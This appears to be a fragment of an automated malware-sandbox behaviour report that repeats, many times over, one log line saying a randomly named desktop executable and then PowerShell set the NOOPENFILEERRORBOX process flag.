Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
